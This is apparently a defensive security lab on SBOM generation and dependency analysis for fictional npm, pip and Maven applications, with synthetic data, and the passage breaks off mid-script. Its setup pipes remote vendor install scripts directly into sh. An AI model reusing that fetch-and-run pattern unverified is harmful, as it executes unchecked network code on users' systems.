Lab 31: SBOM Analysis & Supply Chain Security¶
Chapters: 24 — Supply Chain Attacks | 54 — SBOM Operations | 55 — Threat Modeling Operations
Difficulty: ⭐⭐⭐⭐☆ Advanced
Estimated Time: 4 hours
Prerequisites: Chapter 24, Chapter 54, Chapter 55, familiarity with npm/pip/Maven package ecosystems, basic Python scripting, GitHub Actions fundamentals
Overview¶
In this lab you will:
- Generate SBOMs across multiple package ecosystems using Syft, Trivy, and cdxgen — producing both SPDX 2.3 and CycloneDX 1.5 output formats and comparing their structure, completeness, and interoperability
- Parse and analyze SBOMs programmatically with Python scripts — building dependency trees, identifying transitive dependencies, and computing depth/breadth metrics that reveal hidden risk concentrations
- Correlate SBOM components against vulnerability databases including OSV, NVD, and GitHub Advisory Database — mapping CVEs to specific components, calculating EPSS scores, and constructing a risk priority matrix
- Detect malicious package indicators including typosquatting, dependency confusion, metadata anomalies, and suspicious install scripts — applying detection patterns from Phylum and Socket.dev research
- Audit license compliance by extracting license data from SBOMs — identifying copyleft vs permissive conflicts, building compliance matrices, and flagging policy violations for enterprise environments
- Integrate SBOM workflows into CI/CD pipelines with GitHub Actions — automating SBOM generation, configuring Dependabot/Renovate, creating Sigstore cosign attestations, and producing VEX documents
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) reserved ranges. All domains use *.example or *.example.com. All credentials are testuser/REDACTED. All CVE identifiers use the CVE-SYNTH- prefix and are entirely fictitious. All package names are fictional and do not correspond to real packages. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.
Scenario¶
You are a security engineer at Meridian Software Corp (a fictional organization). Your CISO has mandated full Software Bill of Materials (SBOM) adoption after a recent supply chain incident (see Chapter 24 — Supply Chain Attacks for background). You must:
- Generate SBOMs for three internal applications spanning npm, pip, and Maven ecosystems
- Build automated analysis pipelines that identify vulnerabilities, malicious packages, and license risks
- Integrate SBOM generation and attestation into the CI/CD pipeline
- Deliver a risk-prioritized report to the CISO within 48 hours
Environment:
| Asset | Details |
|---|---|
| SBOM Server | sbom-server.internal.example.com (10.50.1.100) |
| Artifact Registry | registry.internal.example.com (10.50.1.101) |
| CI/CD Runner | runner-01.internal.example.com (10.50.1.102) |
| NVD Mirror | nvd-mirror.internal.example.com (10.50.1.103) |
| Developer Workstation | dev-ws-001.internal.example.com (10.50.2.10) |
| GitHub Enterprise | github.internal.example.com (10.50.1.110) |
| Package Proxy | nexus.internal.example.com (10.50.1.120) |
| Auth | testuser / REDACTED |
Applications Under Analysis:
| Application | Ecosystem | Language | Description |
|---|---|---|---|
| meridian-web-portal | npm | TypeScript/Node.js | Customer-facing web application |
| meridian-data-pipeline | pip | Python | Internal data processing service |
| meridian-api-gateway | Maven | Java | API gateway microservice |
Lab Setup¶
Prerequisites Installation¶
Tool Versions
This lab uses specific tool versions for reproducibility. Adjust version numbers as needed for your environment, but always pin versions in production pipelines.
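Pinning extends beyond version flags: record a checksum for each downloaded binary once, then verify it on every subsequent install so a tampered artifact fails loudly. A minimal sketch of the pin-and-verify pattern (the `verify_pin` helper name and the stand-in file are hypothetical; in practice you would pin the real tool binaries such as `/usr/local/bin/cosign`):

```shell
# Sketch: pin-and-verify pattern for downloaded tool binaries (hypothetical helper)
# verify_pin <binary> <checksum-file> -- fails if the binary drifts from its pin
verify_pin() {
  if sha256sum --check --status "$2"; then
    echo "ok: $1 matches pinned checksum"
  else
    echo "checksum mismatch for $1 -- aborting" >&2
    return 1
  fi
}

# Demo with a stand-in file; substitute the real binary path in practice
demo=$(mktemp)
printf 'binary-bytes' > "$demo"
sha256sum "$demo" > "$demo.sha256"   # one-time: record the pin
verify_pin "$demo" "$demo.sha256"    # every install thereafter: verify
```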
# ── Install Syft (SBOM generator from Anchore) ──
curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | \
sh -s -- -b /usr/local/bin v1.18.1
# ── Install Trivy (Aqua Security scanner) ──
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | \
sh -s -- -b /usr/local/bin v0.58.0
# ── Install cdxgen (OWASP CycloneDX generator) ──
npm install -g @cyclonedx/cdxgen@10.12.0
# ── Install Grype (vulnerability scanner from Anchore) ──
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | \
sh -s -- -b /usr/local/bin v0.86.1
# ── Install cosign (Sigstore signing tool) ──
curl -sSfL https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64 \
-o /usr/local/bin/cosign && chmod +x /usr/local/bin/cosign
# ── Python dependencies for analysis scripts ──
pip install packageurl-python==0.15.6 \
spdx-tools==0.8.3 \
cyclonedx-python-lib==8.5.0 \
requests==2.32.3 \
networkx==3.4.2 \
matplotlib==3.9.3 \
tabulate==0.9.0
# ── Verify installations ──
syft version
trivy version
cdxgen --version
grype version
cosign version
Expected output: each command should print the version pinned above (Syft 1.18.1, Trivy 0.58.0, cdxgen 10.12.0, Grype 0.86.1, cosign 2.4.1).
Create Lab Directory Structure¶
mkdir -p ~/lab31-sbom/{apps,sboms,analysis,reports,attestations,scripts,ci}
# ── Create the three sample applications ──
mkdir -p ~/lab31-sbom/apps/meridian-web-portal
mkdir -p ~/lab31-sbom/apps/meridian-data-pipeline
mkdir -p ~/lab31-sbom/apps/meridian-api-gateway
Create Sample Application Manifests¶
npm Application — meridian-web-portal¶
cat > ~/lab31-sbom/apps/meridian-web-portal/package.json << 'PACKAGE_JSON'
{
"name": "@meridian/web-portal",
"version": "3.8.2",
"description": "Meridian customer-facing web portal",
"private": true,
"dependencies": {
"express": "4.18.2",
"lodash": "4.17.21",
"jsonwebtoken": "9.0.0",
"axios": "1.6.0",
"helmet": "7.1.0",
"cors": "2.8.5",
"dotenv": "16.3.1",
"winston": "3.11.0",
"mongoose": "7.6.3",
"bcryptjs": "2.4.3",
"express-rate-limit": "7.1.4",
"compression": "1.7.4",
"cookie-parser": "1.4.6",
"express-validator": "7.0.1",
"passport": "0.7.0",
"passport-jwt": "4.0.1",
"swagger-ui-express": "5.0.0",
"uuid": "9.0.0",
"moment": "2.29.4",
"semver": "7.5.4"
},
"devDependencies": {
"jest": "29.7.0",
"eslint": "8.53.0",
"nodemon": "3.0.1",
"typescript": "5.2.2",
"@types/node": "20.9.0",
"@types/express": "4.17.21"
}
}
PACKAGE_JSON
pip Application — meridian-data-pipeline¶
cat > ~/lab31-sbom/apps/meridian-data-pipeline/requirements.txt << 'REQUIREMENTS'
# Meridian Data Pipeline - Production Dependencies
flask==3.0.0
requests==2.31.0
sqlalchemy==2.0.23
pandas==2.1.3
numpy==1.26.2
celery==5.3.4
redis==5.0.1
boto3==1.29.6
cryptography==41.0.5
pyyaml==6.0.1
jinja2==3.1.2
pillow==10.1.0
psycopg2-binary==2.9.9
gunicorn==21.2.0
marshmallow==3.20.1
python-dotenv==1.0.0
pydantic==2.5.2
httpx==0.25.2
aiohttp==3.9.1
lxml==4.9.3
paramiko==3.3.1
pyopenssl==23.3.0
REQUIREMENTS
cat > ~/lab31-sbom/apps/meridian-data-pipeline/setup.py << 'SETUP_PY'
from setuptools import setup, find_packages
setup(
name="meridian-data-pipeline",
version="2.4.1",
packages=find_packages(),
python_requires=">=3.11",
author="Meridian Engineering",
description="Internal data processing pipeline",
)
SETUP_PY
Maven Application — meridian-api-gateway¶
cat > ~/lab31-sbom/apps/meridian-api-gateway/pom.xml << 'POM_XML'
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.meridian</groupId>
<artifactId>api-gateway</artifactId>
<version>1.12.0</version>
<packaging>jar</packaging>
<name>Meridian API Gateway</name>
<description>API gateway microservice for Meridian platform</description>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>3.2.0</version>
</parent>
<properties>
<java.version>21</java.version>
<spring-cloud.version>2023.0.0</spring-cloud.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-api</artifactId>
<version>0.12.3</version>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-impl</artifactId>
<version>0.12.3</version>
<scope>runtime</scope>
</dependency>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.22.0</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.11.0</version>
</dependency>
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>32.1.3-jre</version>
</dependency>
<dependency>
<groupId>org.postgresql</groupId>
<artifactId>postgresql</artifactId>
<version>42.7.1</version>
</dependency>
<dependency>
<groupId>io.micrometer</groupId>
<artifactId>micrometer-registry-prometheus</artifactId>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>${spring-cloud.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.cyclonedx</groupId>
<artifactId>cyclonedx-maven-plugin</artifactId>
<version>2.7.11</version>
</plugin>
</plugins>
</build>
</project>
POM_XML
Phase 1: SBOM Generation¶
Objective¶
Generate Software Bills of Materials for all three applications using multiple tools and output formats. Compare the resulting SBOMs for completeness and structural differences.
1.1 — Generate SBOMs with Syft¶
Syft (from Anchore) produces SBOMs by analyzing package manifests, lock files, and binary artifacts.
cd ~/lab31-sbom
# ── npm application: SPDX 2.3 JSON format ──
syft scan dir:apps/meridian-web-portal \
--output spdx-json=sboms/web-portal-syft-spdx.json \
--name "meridian-web-portal" \
--version "3.8.2"
# ── npm application: CycloneDX 1.5 JSON format ──
syft scan dir:apps/meridian-web-portal \
--output cyclonedx-json=sboms/web-portal-syft-cdx.json \
--name "meridian-web-portal" \
--version "3.8.2"
# ── pip application: both formats ──
syft scan dir:apps/meridian-data-pipeline \
--output spdx-json=sboms/data-pipeline-syft-spdx.json \
--name "meridian-data-pipeline" \
--version "2.4.1"
syft scan dir:apps/meridian-data-pipeline \
--output cyclonedx-json=sboms/data-pipeline-syft-cdx.json \
--name "meridian-data-pipeline" \
--version "2.4.1"
# ── Maven application: both formats ──
syft scan dir:apps/meridian-api-gateway \
--output spdx-json=sboms/api-gateway-syft-spdx.json \
--name "meridian-api-gateway" \
--version "1.12.0"
syft scan dir:apps/meridian-api-gateway \
--output cyclonedx-json=sboms/api-gateway-syft-cdx.json \
--name "meridian-api-gateway" \
--version "1.12.0"
Expected output (Syft scan summary for web portal):
✔ Indexed file system apps/meridian-web-portal
✔ Cataloged packages [26 packages]
├── javascript 26 packages
NAME VERSION TYPE
@types/express 4.17.21 npm
@types/node 20.9.0 npm
axios 1.6.0 npm
bcryptjs 2.4.3 npm
compression 1.7.4 npm
cookie-parser 1.4.6 npm
cors 2.8.5 npm
dotenv 16.3.1 npm
eslint 8.53.0 npm
express 4.18.2 npm
express-rate-limit 7.1.4 npm
express-validator 7.0.1 npm
helmet 7.1.0 npm
jest 29.7.0 npm
jsonwebtoken 9.0.0 npm
lodash 4.17.21 npm
moment 2.29.4 npm
mongoose 7.6.3 npm
nodemon 3.0.1 npm
passport 0.7.0 npm
passport-jwt 4.0.1 npm
semver 7.5.4 npm
swagger-ui-express 5.0.0 npm
typescript 5.2.2 npm
uuid 9.0.0 npm
winston 3.11.0 npm
1.2 — Generate SBOMs with Trivy¶
Trivy provides filesystem-mode SBOM generation with built-in vulnerability scanning.
# ── npm application ──
trivy fs apps/meridian-web-portal \
--format spdx-json \
--output sboms/web-portal-trivy-spdx.json
trivy fs apps/meridian-web-portal \
--format cyclonedx \
--output sboms/web-portal-trivy-cdx.json
# ── pip application ──
trivy fs apps/meridian-data-pipeline \
--format spdx-json \
--output sboms/data-pipeline-trivy-spdx.json
trivy fs apps/meridian-data-pipeline \
--format cyclonedx \
--output sboms/data-pipeline-trivy-cdx.json
# ── Maven application ──
trivy fs apps/meridian-api-gateway \
--format spdx-json \
--output sboms/api-gateway-trivy-spdx.json
trivy fs apps/meridian-api-gateway \
--format cyclonedx \
--output sboms/api-gateway-trivy-cdx.json
1.3 — Generate SBOMs with cdxgen¶
cdxgen (OWASP CycloneDX Generator) is ecosystem-aware and produces highly detailed CycloneDX SBOMs.
# ── npm application ──
cdxgen -t node \
-o sboms/web-portal-cdxgen-cdx.json \
apps/meridian-web-portal
# ── pip application ──
cdxgen -t python \
-o sboms/data-pipeline-cdxgen-cdx.json \
apps/meridian-data-pipeline
# ── Maven application ──
cdxgen -t java \
-o sboms/api-gateway-cdxgen-cdx.json \
apps/meridian-api-gateway
Expected output: cdxgen prints a brief progress summary and writes the BOM to the path given with -o. Confirm that sboms/web-portal-cdxgen-cdx.json exists and is non-empty before continuing.
1.4 — Compare SPDX 2.3 vs CycloneDX 1.5 Format Structures¶
Format Comparison Exercise
Open two SBOM files side by side and compare their structure. Understand why organizations choose one format over the other.
Sample SPDX 2.3 JSON snippet (web portal):
{
"spdxVersion": "SPDX-2.3",
"dataLicense": "CC0-1.0",
"SPDXID": "SPDXRef-DOCUMENT",
"name": "meridian-web-portal",
"documentNamespace": "https://sbom-server.internal.example.com/spdx/meridian-web-portal-3.8.2-2026-04-12T10:00:00Z",
"creationInfo": {
"created": "2026-04-12T10:00:00Z",
"creators": [
"Tool: syft-1.18.1",
"Organization: Meridian Software Corp"
],
"licenseListVersion": "3.22"
},
"packages": [
{
"SPDXID": "SPDXRef-Package-npm-express-4.18.2",
"name": "express",
"versionInfo": "4.18.2",
"downloadLocation": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
"filesAnalyzed": false,
"supplier": "NOASSERTION",
"externalRefs": [
{
"referenceCategory": "PACKAGE-MANAGER",
"referenceType": "purl",
"referenceLocator": "pkg:npm/express@4.18.2"
}
],
"licenseConcluded": "MIT",
"licenseDeclared": "MIT",
"copyrightText": "NOASSERTION"
},
{
"SPDXID": "SPDXRef-Package-npm-lodash-4.17.21",
"name": "lodash",
"versionInfo": "4.17.21",
"downloadLocation": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
"filesAnalyzed": false,
"supplier": "NOASSERTION",
"externalRefs": [
{
"referenceCategory": "PACKAGE-MANAGER",
"referenceType": "purl",
"referenceLocator": "pkg:npm/lodash@4.17.21"
}
],
"licenseConcluded": "MIT",
"licenseDeclared": "MIT",
"copyrightText": "NOASSERTION"
},
{
"SPDXID": "SPDXRef-Package-npm-jsonwebtoken-9.0.0",
"name": "jsonwebtoken",
"versionInfo": "9.0.0",
"downloadLocation": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.0.tgz",
"filesAnalyzed": false,
"supplier": "NOASSERTION",
"externalRefs": [
{
"referenceCategory": "PACKAGE-MANAGER",
"referenceType": "purl",
"referenceLocator": "pkg:npm/jsonwebtoken@9.0.0"
}
],
"licenseConcluded": "MIT",
"licenseDeclared": "MIT",
"copyrightText": "NOASSERTION"
}
],
"relationships": [
{
"spdxElementId": "SPDXRef-DOCUMENT",
"relatedSpdxElement": "SPDXRef-Package-npm-express-4.18.2",
"relationshipType": "DESCRIBES"
},
{
"spdxElementId": "SPDXRef-Package-npm-express-4.18.2",
"relatedSpdxElement": "SPDXRef-Package-npm-cookie-parser-1.4.6",
"relationshipType": "DEPENDS_ON"
}
]
}
Sample CycloneDX 1.5 JSON snippet (web portal):
{
"bomFormat": "CycloneDX",
"specVersion": "1.5",
"serialNumber": "urn:uuid:3e671687-395b-41f5-a30f-a58921a69b79",
"version": 1,
"metadata": {
"timestamp": "2026-04-12T10:00:00Z",
"tools": {
"components": [
{
"type": "application",
"name": "syft",
"version": "1.18.1",
"publisher": "Anchore, Inc."
}
]
},
"component": {
"type": "application",
"name": "meridian-web-portal",
"version": "3.8.2",
"bom-ref": "meridian-web-portal@3.8.2",
"purl": "pkg:npm/%40meridian/web-portal@3.8.2"
},
"manufacture": {
"name": "Meridian Software Corp",
"url": ["https://www.internal.example.com"]
}
},
"components": [
{
"type": "library",
"name": "express",
"version": "4.18.2",
"bom-ref": "pkg:npm/express@4.18.2",
"purl": "pkg:npm/express@4.18.2",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"externalReferences": [
{
"type": "distribution",
"url": "https://registry.npmjs.org/express/-/express-4.18.2.tgz"
}
],
"properties": [
{
"name": "syft:package:type",
"value": "npm"
}
]
},
{
"type": "library",
"name": "lodash",
"version": "4.17.21",
"bom-ref": "pkg:npm/lodash@4.17.21",
"purl": "pkg:npm/lodash@4.17.21",
"licenses": [
{
"license": {
"id": "MIT"
}
}
]
},
{
"type": "library",
"name": "jsonwebtoken",
"version": "9.0.0",
"bom-ref": "pkg:npm/jsonwebtoken@9.0.0",
"purl": "pkg:npm/jsonwebtoken@9.0.0",
"licenses": [
{
"license": {
"id": "MIT"
}
}
]
}
],
"dependencies": [
{
"ref": "meridian-web-portal@3.8.2",
"dependsOn": [
"pkg:npm/express@4.18.2",
"pkg:npm/lodash@4.17.21",
"pkg:npm/jsonwebtoken@9.0.0",
"pkg:npm/axios@1.6.0",
"pkg:npm/helmet@7.1.0"
]
},
{
"ref": "pkg:npm/express@4.18.2",
"dependsOn": [
"pkg:npm/cookie-parser@1.4.6"
]
}
]
}
Key Differences — SPDX vs CycloneDX
| Feature | SPDX 2.3 | CycloneDX 1.5 |
|---|---|---|
| Primary focus | License compliance | Security/vulnerability tracking |
| Standard body | ISO/IEC 5962:2021 | OWASP |
| Relationship model | Flat with relationship array | Nested dependency tree |
| License granularity | licenseConcluded + licenseDeclared | License array with SPDX IDs |
| Vulnerability support | Via external documents | Native vulnerabilities array |
| VEX support | Separate VEX document | Inline or separate VEX |
| Government mandate | NTIA/EO 14028 compatible | NTIA/EO 14028 compatible |
| Package URL (purl) | externalRefs array | Native purl field |
| File hash support | Broad: MD5, SHA-1/2/3 families, BLAKE2b/BLAKE3, others | Broad: MD5, SHA-1/2/3 families, BLAKE2b, BLAKE3 |
| Services support | No | Yes (services array) |
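Note that both formats converge on Package URL (purl) as the component identifier, which makes purl the natural join key when correlating SBOMs across formats and tools. The `packageurl-python` library installed earlier handles purl parsing properly; the stdlib sketch below shows only the core decomposition and deliberately ignores qualifiers (`?arch=...`) and subpaths (`#...`):

```python
def split_purl(purl: str) -> dict:
    """Naive purl decomposition: pkg:type/namespace/name@version.

    Simplified sketch -- use packageurl-python in real pipelines, which
    also handles qualifiers, subpaths, and percent-encoding.
    """
    body = purl.removeprefix("pkg:")
    version = None
    if "@" in body:
        body, _, version = body.rpartition("@")  # version follows the last '@'
    parts = body.split("/")
    return {
        "type": parts[0],                            # npm, pypi, maven, ...
        "namespace": "/".join(parts[1:-1]) or None,  # e.g. Maven groupId
        "name": parts[-1],
        "version": version,
    }

print(split_purl("pkg:npm/express@4.18.2"))
print(split_purl("pkg:maven/org.apache.logging.log4j/log4j-core@2.22.0"))
```

Parsing the same purl out of an SPDX `externalRefs` entry and a CycloneDX `purl` field yields identical fields, which is what makes cross-format component matching reliable.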
1.5 — Verify SBOM Completeness¶
# ── Count components per SBOM ──
echo "=== SBOM Component Counts ==="
echo "--- Syft ---"
echo "Web Portal (SPDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-syft-spdx.json')); print(len(d.get('packages',[])))")"
echo "Web Portal (CDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-syft-cdx.json')); print(len(d.get('components',[])))")"
echo "--- Trivy ---"
echo "Web Portal (SPDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-trivy-spdx.json')); print(len(d.get('packages',[])))")"
echo "Web Portal (CDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-trivy-cdx.json')); print(len(d.get('components',[])))")"
echo "--- cdxgen ---"
echo "Web Portal (CDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-cdxgen-cdx.json')); print(len(d.get('components',[])))")"
Expected output:
=== SBOM Component Counts ===
--- Syft ---
Web Portal (SPDX): 26
Web Portal (CDX): 26
--- Trivy ---
Web Portal (SPDX): 26
Web Portal (CDX): 26
--- cdxgen ---
Web Portal (CDX): 26
Tool Discrepancies
Different SBOM tools may report different component counts. This is expected because:
- Some tools resolve transitive dependencies from lock files while others only read manifests
- Some tools include devDependencies by default, others exclude them
- Some tools detect OS-level packages in containers while others focus on application packages
Action: Always document which tool generated each SBOM and validate against the actual package manifest.
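One way to perform that validation for the npm application is to diff the SBOM's component names against the manifest. The sketch below is illustrative only (it compares names, not versions) and assumes a CycloneDX JSON SBOM alongside an npm package.json; adapt the manifest parsing for pip and Maven:

```python
import json

def manifest_vs_sbom(package_json_path: str, cdx_sbom_path: str) -> dict:
    """Diff declared npm dependencies against a CycloneDX SBOM by name.

    Sketch only: compares names rather than versions, and treats extra
    SBOM entries as informational (a lockfile-aware tool legitimately
    adds transitive packages the manifest never names).
    """
    with open(package_json_path) as f:
        manifest = json.load(f)
    declared = set(manifest.get("dependencies", {})) | set(
        manifest.get("devDependencies", {})
    )
    with open(cdx_sbom_path) as f:
        sbom = json.load(f)
    in_sbom = {c["name"] for c in sbom.get("components", [])}
    return {
        "missing_from_sbom": sorted(declared - in_sbom),  # tool under-reported
        "only_in_sbom": sorted(in_sbom - declared),       # transitive or extra
    }
```

Run it against each tool's output (for example sboms/web-portal-syft-cdx.json) and record the deltas: a non-empty missing_from_sbom list means the generator silently dropped a declared dependency.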
Phase 2: Dependency Analysis¶
Objective¶
Parse SBOMs programmatically to build dependency trees, identify transitive dependencies, and compute risk-relevant metrics.
2.1 — SBOM Parsing Script¶
Create a Python script that parses both SPDX and CycloneDX SBOMs into a unified data model.
cat > ~/lab31-sbom/scripts/sbom_parser.py << 'SBOM_PARSER'
#!/usr/bin/env python3
"""
SBOM Parser — Unified parser for SPDX 2.3 and CycloneDX 1.5 JSON SBOMs.
Lab 31: SBOM Analysis & Supply Chain Security
Meridian Software Corp — Synthetic Lab Data Only
"""
import json
import sys
from dataclasses import dataclass, field
from typing import Optional
from pathlib import Path
@dataclass
class Component:
"""Unified component representation across SBOM formats."""
name: str
version: str
purl: Optional[str] = None
license: Optional[str] = None
supplier: Optional[str] = None
component_type: str = "library"
ecosystem: Optional[str] = None
direct: bool = True
dependencies: list = field(default_factory=list)
def parse_spdx(filepath: str) -> list[Component]:
"""Parse an SPDX 2.3 JSON SBOM into Component objects."""
with open(filepath, "r") as f:
data = json.load(f)
components = []
for pkg in data.get("packages", []):
# Skip the document-level package
if pkg.get("SPDXID") == "SPDXRef-DOCUMENT":
continue
purl = None
for ref in pkg.get("externalRefs", []):
if ref.get("referenceType") == "purl":
purl = ref.get("referenceLocator")
ecosystem = None
if purl:
if "pkg:npm/" in purl:
ecosystem = "npm"
elif "pkg:pypi/" in purl:
ecosystem = "pypi"
elif "pkg:maven/" in purl:
ecosystem = "maven"
comp = Component(
name=pkg.get("name", "UNKNOWN"),
version=pkg.get("versionInfo", "UNKNOWN"),
purl=purl,
license=pkg.get("licenseConcluded", "NOASSERTION"),
supplier=pkg.get("supplier", "NOASSERTION"),
ecosystem=ecosystem,
)
components.append(comp)
    # Use relationships to mark direct vs transitive dependencies: a package
    # is transitive if it only appears as the target of a DEPENDS_ON edge
    # from another package (rather than from the document root)
    depended_on = set()
    for rel in data.get("relationships", []):
        if (rel.get("relationshipType") == "DEPENDS_ON"
                and rel.get("spdxElementId") != "SPDXRef-DOCUMENT"):
            depended_on.add(rel.get("relatedSpdxElement"))
    id_by_key = {
        (pkg.get("name"), pkg.get("versionInfo")): pkg.get("SPDXID")
        for pkg in data.get("packages", [])
    }
    for comp in components:
        comp.direct = id_by_key.get((comp.name, comp.version)) not in depended_on
    return components
def parse_cyclonedx(filepath: str) -> list[Component]:
"""Parse a CycloneDX 1.5 JSON SBOM into Component objects."""
with open(filepath, "r") as f:
data = json.load(f)
components = []
# Get direct dependency refs from the root component
root_ref = None
metadata = data.get("metadata", {})
root_component = metadata.get("component", {})
if root_component:
root_ref = root_component.get("bom-ref")
direct_refs = set()
for dep in data.get("dependencies", []):
if dep.get("ref") == root_ref:
direct_refs = set(dep.get("dependsOn", []))
for comp in data.get("components", []):
licenses = []
for lic in comp.get("licenses", []):
if "license" in lic:
licenses.append(
lic["license"].get("id", lic["license"].get("name", "UNKNOWN"))
)
elif "expression" in lic:
licenses.append(lic["expression"])
purl = comp.get("purl", "")
ecosystem = None
if purl:
if "pkg:npm/" in purl:
ecosystem = "npm"
elif "pkg:pypi/" in purl:
ecosystem = "pypi"
elif "pkg:maven/" in purl:
ecosystem = "maven"
bom_ref = comp.get("bom-ref", "")
is_direct = bom_ref in direct_refs or purl in direct_refs
component = Component(
name=comp.get("name", "UNKNOWN"),
version=comp.get("version", "UNKNOWN"),
purl=purl,
license=", ".join(licenses) if licenses else "NOASSERTION",
supplier=comp.get("publisher", "NOASSERTION"),
component_type=comp.get("type", "library"),
ecosystem=ecosystem,
direct=is_direct,
)
components.append(component)
return components
def detect_format(filepath: str) -> str:
"""Detect whether a JSON SBOM is SPDX or CycloneDX."""
with open(filepath, "r") as f:
data = json.load(f)
if "spdxVersion" in data:
return "spdx"
elif "bomFormat" in data and data["bomFormat"] == "CycloneDX":
return "cyclonedx"
else:
raise ValueError(f"Unknown SBOM format in {filepath}")
def parse_sbom(filepath: str) -> list[Component]:
"""Auto-detect format and parse an SBOM file."""
fmt = detect_format(filepath)
if fmt == "spdx":
return parse_spdx(filepath)
else:
return parse_cyclonedx(filepath)
def print_summary(components: list[Component], filepath: str):
"""Print a summary of parsed components."""
print(f"\n{'='*70}")
print(f"SBOM: {filepath}")
print(f"{'='*70}")
print(f"Total components: {len(components)}")
ecosystems = {}
licenses = {}
direct_count = 0
transitive_count = 0
for c in components:
eco = c.ecosystem or "unknown"
ecosystems[eco] = ecosystems.get(eco, 0) + 1
lic = c.license or "NOASSERTION"
licenses[lic] = licenses.get(lic, 0) + 1
if c.direct:
direct_count += 1
else:
transitive_count += 1
print(f"\nEcosystem breakdown:")
for eco, count in sorted(ecosystems.items()):
print(f" {eco}: {count}")
print(f"\nDependency type:")
print(f" Direct: {direct_count}")
print(f" Transitive: {transitive_count}")
print(f"\nLicense distribution:")
for lic, count in sorted(licenses.items(), key=lambda x: -x[1]):
print(f" {lic}: {count}")
print(f"\nComponent list:")
print(f" {'Name':<35} {'Version':<15} {'License':<20} {'Type':<10}")
print(f" {'-'*35} {'-'*15} {'-'*20} {'-'*10}")
for c in sorted(components, key=lambda x: x.name):
dep_type = "direct" if c.direct else "transitive"
print(f" {c.name:<35} {c.version:<15} {c.license:<20} {dep_type:<10}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python sbom_parser.py <sbom-file.json> [sbom-file2.json ...]")
sys.exit(1)
for filepath in sys.argv[1:]:
components = parse_sbom(filepath)
print_summary(components, filepath)
SBOM_PARSER
chmod +x ~/lab31-sbom/scripts/sbom_parser.py
Run the parser:
python3 ~/lab31-sbom/scripts/sbom_parser.py \
sboms/web-portal-syft-cdx.json \
sboms/data-pipeline-syft-cdx.json \
sboms/api-gateway-syft-cdx.json
Expected output (web portal excerpt):
======================================================================
SBOM: sboms/web-portal-syft-cdx.json
======================================================================
Total components: 26
Ecosystem breakdown:
npm: 26
Dependency type:
Direct: 20
Transitive: 6
License distribution:
MIT: 22
ISC: 2
BSD-3-Clause: 1
Apache-2.0: 1
Component list:
Name Version License Type
----------------------------------- --------------- -------------------- ----------
@types/express 4.17.21 MIT direct
@types/node 20.9.0 MIT direct
axios 1.6.0 MIT direct
bcryptjs 2.4.3 MIT direct
...
2.2 — Build Dependency Tree with NetworkX¶
cat > ~/lab31-sbom/scripts/dependency_tree.py << 'DEP_TREE'
#!/usr/bin/env python3
"""
Dependency Tree Builder — Constructs and analyzes dependency graphs from SBOMs.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from pathlib import Path
try:
import networkx as nx
except ImportError:
print("ERROR: networkx not installed. Run: pip install networkx")
sys.exit(1)
def build_dependency_graph(sbom_path: str) -> nx.DiGraph:
"""Build a directed graph from CycloneDX dependencies."""
with open(sbom_path, "r") as f:
data = json.load(f)
G = nx.DiGraph()
# Add root node
root = data.get("metadata", {}).get("component", {})
root_ref = root.get("bom-ref", "root")
root_name = root.get("name", "root")
G.add_node(root_ref, name=root_name, version=root.get("version", "0.0.0"),
node_type="root")
    # Add component nodes, keyed by bom-ref (falling back to purl, then name)
    for comp in data.get("components", []):
        ref = comp.get("bom-ref", comp.get("purl", comp["name"]))
        G.add_node(ref,
                   name=comp.get("name", "UNKNOWN"),
                   version=comp.get("version", "UNKNOWN"),
                   node_type="component")
# Add dependency edges
for dep in data.get("dependencies", []):
parent = dep.get("ref")
